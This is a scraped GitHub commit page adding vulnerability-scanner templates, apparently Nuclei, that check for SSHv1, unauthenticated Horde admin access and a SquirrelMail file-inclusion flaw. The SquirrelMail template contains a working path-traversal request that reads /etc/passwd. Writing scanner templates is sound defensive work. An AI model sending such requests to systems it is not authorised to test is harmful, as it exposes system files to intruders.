-
Notifications
You must be signed in to change notification settings - Fork 53
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
test
committed
Oct 25, 2024
1 parent
2b2d618
commit 5f465d3
Showing
4,067 changed files
with
687,517 additions
and
185,506 deletions.
The diff you're trying to view is too large. We only load the first 3000 changed files.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
File renamed without changes.
This file was deleted.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
id: CVE-2001-1473 | ||
|
||
info: | ||
name: Deprecated SSHv1 Protocol Detection | ||
author: iamthefrogy | ||
severity: high | ||
tags: network,ssh,openssh,cves,cves2001 | ||
description: SSHv1 is deprecated and has known cryptographic issues. | ||
remediation: Upgrade to SSH 2.4 or later. | ||
reference: | ||
- https://www.kb.cert.org/vuls/id/684820 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473 | ||
classification: | ||
cvss-score: 7.4 | ||
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N | ||
cve-id: CVE-2001-1473 | ||
cwe-id: CWE-310 | ||
|
||
network: | ||
- host: | ||
- "{{Hostname}}" | ||
- "{{Host}}:22" | ||
|
||
matchers: | ||
- type: word | ||
words: | ||
- "SSH-1" | ||
|
||
# Updated by Chris on 2022/01/21 |
File renamed without changes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,36 @@ | ||
id: CVE-2005-3344 | ||
|
||
info: | ||
name: Horde Groupware Unauthenticated Admin Access | ||
author: pikpikcu | ||
severity: critical | ||
description: Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access. | ||
tags: horde,unauth | ||
remediation: | ||
reference: | ||
- https://nvd.nist.gov/vuln/detail/CVE-2005-3344 | ||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3344 | ||
classification: | ||
cve-id: CVE-2005-3344 | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/horde/admin/user.php" | ||
- "{{BaseURL}}/admin/user.php" | ||
headers: | ||
Content-Type: text/html | ||
|
||
matchers-condition: and | ||
matchers: | ||
|
||
- type: word | ||
words: | ||
- "<title>Horde :: User Administration</title>" | ||
condition: and | ||
|
||
- type: status | ||
status: | ||
- 200 | ||
|
||
# Enhanced by mp on 2022/03/18 |
This file was deleted.
Oops, something went wrong.
File renamed without changes.
This file was deleted.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,25 @@ | ||
id: CVE-2006-2842 | ||
|
||
info: | ||
name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion | ||
author: dhiyaneshDk | ||
severity: high | ||
description: "PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable." | ||
reference: https://www.exploit-db.com/exploits/27948 | ||
tags: cve2006,lfi,squirrelmail,cve | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00" | ||
|
||
matchers-condition: and | ||
matchers: | ||
|
||
- type: regex | ||
regex: | ||
- "root:[x*]:0:0" | ||
|
||
- type: status | ||
status: | ||
- 200 |
Oops, something went wrong.